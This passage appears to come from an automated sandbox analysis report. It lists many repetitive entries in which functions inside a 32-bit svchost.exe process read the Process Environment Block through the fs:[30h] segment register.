Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]	2_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]	2_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]	2_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]	2_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]	2_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]	2_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]	2_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]	2_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]	2_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]	2_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]	2_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]	2_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]	2_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]	2_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]	2_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]	2_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]	2_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]	2_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]	2_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]	2_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]	2_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]	2_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]	2_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]	2_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]	2_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]	2_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]	2_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]	2_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]	2_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]	2_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]	2_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]	2_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]	2_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]	2_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]	2_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]	2_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]	2_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]	2_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]	2_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]	2_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]	2_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]	2_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]	2_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]	2_2_032325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]	2_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]	2_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]	2_2_0326A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]	2_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
